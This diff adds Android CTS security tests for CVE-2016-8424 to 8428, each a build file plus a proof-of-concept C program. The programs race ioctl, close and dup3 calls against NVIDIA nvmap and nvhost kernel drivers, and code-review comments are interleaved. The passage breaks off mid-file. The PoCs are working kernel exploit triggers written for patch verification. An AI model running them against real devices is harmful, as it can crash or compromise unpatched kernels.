diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+ static int data = 1024;
+ ioctl(g_fd, NVMAP_IOC_FREE, data);
+ //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(0, 2);
+
+ int i;
+ while (1) {
+ if (init == 0) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ init = 1;
+ }
+ trigger_nvmap_free();
+ }
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ if (init == 0)
+ pthread_cond_signal(&cond);
+ trigger_nvmap_create();
+ }
+ return 0;
+}
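Review bot: Both loops in this file are `while (1)` with no exit, so `return 0` in `main` is unreachable and the binary ends only when something outside it (presumably the host-side test's timeout) kills it. A bounded run such as `for (i = 0; i < MAX_ITERATIONS; i++)` (a new constant to define), with the worker thread told to stop and then joined, would give the test a defined end on a patched device. `race_thread` is declared `void*` but falls off the end without a `return` and declares an unused `int i`. `init` is read in `main` and written in `race_thread` with no synchronisation, so the compiler is free to hoist the `if (init == 0)` test; reading and writing it under the existing `mutex` would make the hand-off well defined. The same unbounded `while (1)` in `main` appears in CVE-2016-8427/poc.c and CVE-2016-8429/poc.c.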
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
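Review bot: When `pthread_create` fails in the thread-creation loop, `main` jumps to `out_close_thread` without logging anything, so a run that started fewer than `CLOSE_THREAD_NUM` threads looks the same in the log as a full run. I would add `printf("[-] create close thread %d failed: %s\n", i, strerror(ret));` before the `goto`, because `pthread_create` returns the error number rather than setting errno. `try_time`, `prepare()`, `toggle_thread_id` and `ARRAY_SIZE` are never used and can go, as can the `#if 1` / `#endif` pairs. `main` also returns 0 when `open` fails, so the exit status cannot tell "device node absent" from "ran to completion"; a header comment saying how the host side decides pass or fail would help. The unused declarations are repeated in CVE-2016-8426/poc.c.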
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ printf("[+] %03d times\n", i);
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
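Review bot: The `pthread_create` failure message prints `errno` and `strerror(errno)`, but `pthread_create` reports its error through the return value and does not set `errno`. The line is also tagged `[+]` although it reports a failure. Suggested: `printf("[-] create close thread %d failed %d %s\n", i, ret, strerror(ret));`. Apart from `DEV` and the extra logging, this file is a copy of CVE-2016-8425/poc.c, so a shared source taking the device path as a parameter would keep the two from drifting apart.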
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+ int ioarg[2];
+ switch ((long)arg) {
+ case 0:
+ fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+ break;
+ case 1:
+ fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+ break;
+ case 2:
+ ioarg[0] = fd_dbg_1;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+ break;
+ case 3:
+ fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+ break;
+ case 4:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ case 5:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ }
+ return 0;
+}
+int poc()
+{
+ long i;
+ pthread_t th;
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ usleep(10000);
+ }
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ if (i%2==0)
+ usleep(10000);
+ }
+ usleep(100000);
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ while(1){
+ pid = fork();
+ if(pid){
+ usleep(30000);
+ }else
+ return poc();
+ }
+ return 0;
+}
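Review bot: `ioctl` is called in `thr` but `<sys/ioctl.h>` is not included, so unless another header pulls in the prototype, the calls rely on an implicit declaration. Add `#include <sys/ioctl.h>`; `<linux/ion.h>` looks unused here. The first call passes three extra `0` arguments, `ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0)`, which the other two calls omit; they look like leftovers from a raw `syscall` form and should be dropped for consistency. `main` forks in an endless loop and never calls `wait`, so exited children accumulate as zombies until the test is killed. No return value from `open`, `dup3`, `ioctl` or `pthread_create` is checked.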
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+ __u64 handles; /* Ptr to u32 type array, holding handles */
+ __u64 offsets; /* Ptr to u32 type array, holding offsets
+ * into handle mem */
+ __u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
+ * regions within each handle */
+ __u32 nr; /* Number of handles */
+ __s32 op; /* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
